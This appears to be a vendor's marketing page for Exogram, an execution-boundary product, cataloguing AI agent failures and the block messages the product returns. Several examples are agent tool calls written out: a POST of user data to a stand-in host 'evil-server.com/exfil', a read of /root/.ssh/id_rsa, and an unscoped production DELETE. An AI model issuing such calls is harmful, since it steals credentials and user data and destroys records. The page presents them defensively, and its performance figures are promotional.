The Viral Engine — Share This

AI Fails Silently. Here Is Every Way.

A catalog of real, reproducible agent failures and how deterministic enforcement stops them.

Prompt engineering is not a security perimeter.

These failures are actively occurring in unprotected production systems today.
Zero Trust For AI

The Anatomy of a Silent Failure

AI without an execution boundary is like a production database without authentication. A single hallucination cascades into systemic data loss.

Step 1
Hallucination
↓ EXOGRAM BLOCKS HERE
Step 2
Wrong Parameter
Step 3
Unauthorized Action
Step 4
Data Loss
Actively observed in production systems:
CRM Automation PipelinesFinancial Transaction HandlersInternal Data ToolingCustomer Support Agents
Common Failure Class

Case 1: The Schema Hallucination

The model decides to be helpful and invents parameters that crash downstream databases.

Probabilistic Output
{
  "name": "Alice",
  "age": 30,
  "inferred_income": "$100k"
}
The Threat: Database rejects the unmapped inferred_income column. Pipeline crashes silently. No error reaches the user.
Exogram Enforcement
🛑 BLOCKED (0.07ms)
SchemaError: Field 'inferred_income' is strictly prohibited by the schema definition.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground
Common Failure Class

Case 2: Context Collapse — Destructive Mutation

The agent forgets its environmental constraints and attempts a mass deletion on production data.

Probabilistic Output
{
  "tool": "sql_compute",
  "query": "DELETE FROM users
            WHERE status = 'inactive';"
}
The Threat: Query intended for test environment executed on production cluster. Catastrophic, irrecoverable data loss.
Exogram Enforcement
🛑 BLOCKED (0.07ms)
SecurityViolation: Mass deletion without explicit user IDs is prohibited on the production cluster.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground
Common Failure Class

Case 3: The Infinite Tool Loop

The model repeatedly calls an API with failing parameters, burning tokens and triggering rate limits.

Probabilistic Output
> Call: fetch_pricing(auth=null)
> Error: 401 Unauthorized
> Call: fetch_pricing(auth=null)
> Error: 401 Unauthorized
> Call: fetch_pricing(auth=null)
...
The Threat: The model cannot recognize its own failure pattern. Orchestrators lack hard circuit breakers. Token spend spirals.
Exogram Enforcement
🛑 CIRCUIT BROKEN (0.07ms)
RateLimitViolation: Tool 'fetch_pricing' called 5 times in 2000ms with identical failing parameters.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground
Common Failure Class

Case 4: Data Exfiltration via API Call

The agent constructs an outbound API call to an untrusted domain, uploading user data.

Probabilistic Output
{
  "tool": "http_request",
  "method": "POST",
  "url": "https://evil-server.com/exfil",
  "body": "user_data=..."
}
The Threat: Stolen PII, credentials, or proprietary data POSTed to an attacker-controlled server. No audit trail.
Exogram Enforcement
🛑 BLOCKED (0.07ms)
ExfiltrationGuard: Outbound API call to untrusted domain 'evil-server.com' is prohibited.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground
Common Failure Class

Case 5: Privilege Escalation via Filesystem

The agent attempts to read SSH keys, /etc/passwd, or system configuration files.

Probabilistic Output
{
  "tool": "file_read",
  "path": "/root/.ssh/id_rsa"
}
The Threat: Credential theft enables lateral movement. The agent gains access beyond its intended scope.
Exogram Enforcement
🛑 BLOCKED (0.07ms)
FilesystemGuard: Access to /root/.ssh/ is strictly prohibited. Privileged paths are blocked.
Precise error trace returned to the client for automated recovery. No guessing.
Risk: High | Exogram Protection: Native
Replay this failure in Proving Ground

The Pattern

Every failure shares the same root cause: the execution layer trusts the probabilistic output. Prompt engineering is a suggestion. System prompts are a suggestion. Tool descriptions are a suggestion. None of them are enforceable contracts.

Exogram replaces suggestions with deterministic logic gates — Python code that evaluates in 0.07ms, produces the same result every time, and returns precise error traces for automated recovery.

0.07ms
Evaluation Time
0
False Negatives
8
Policy Rules
134 RPS
Production Throughput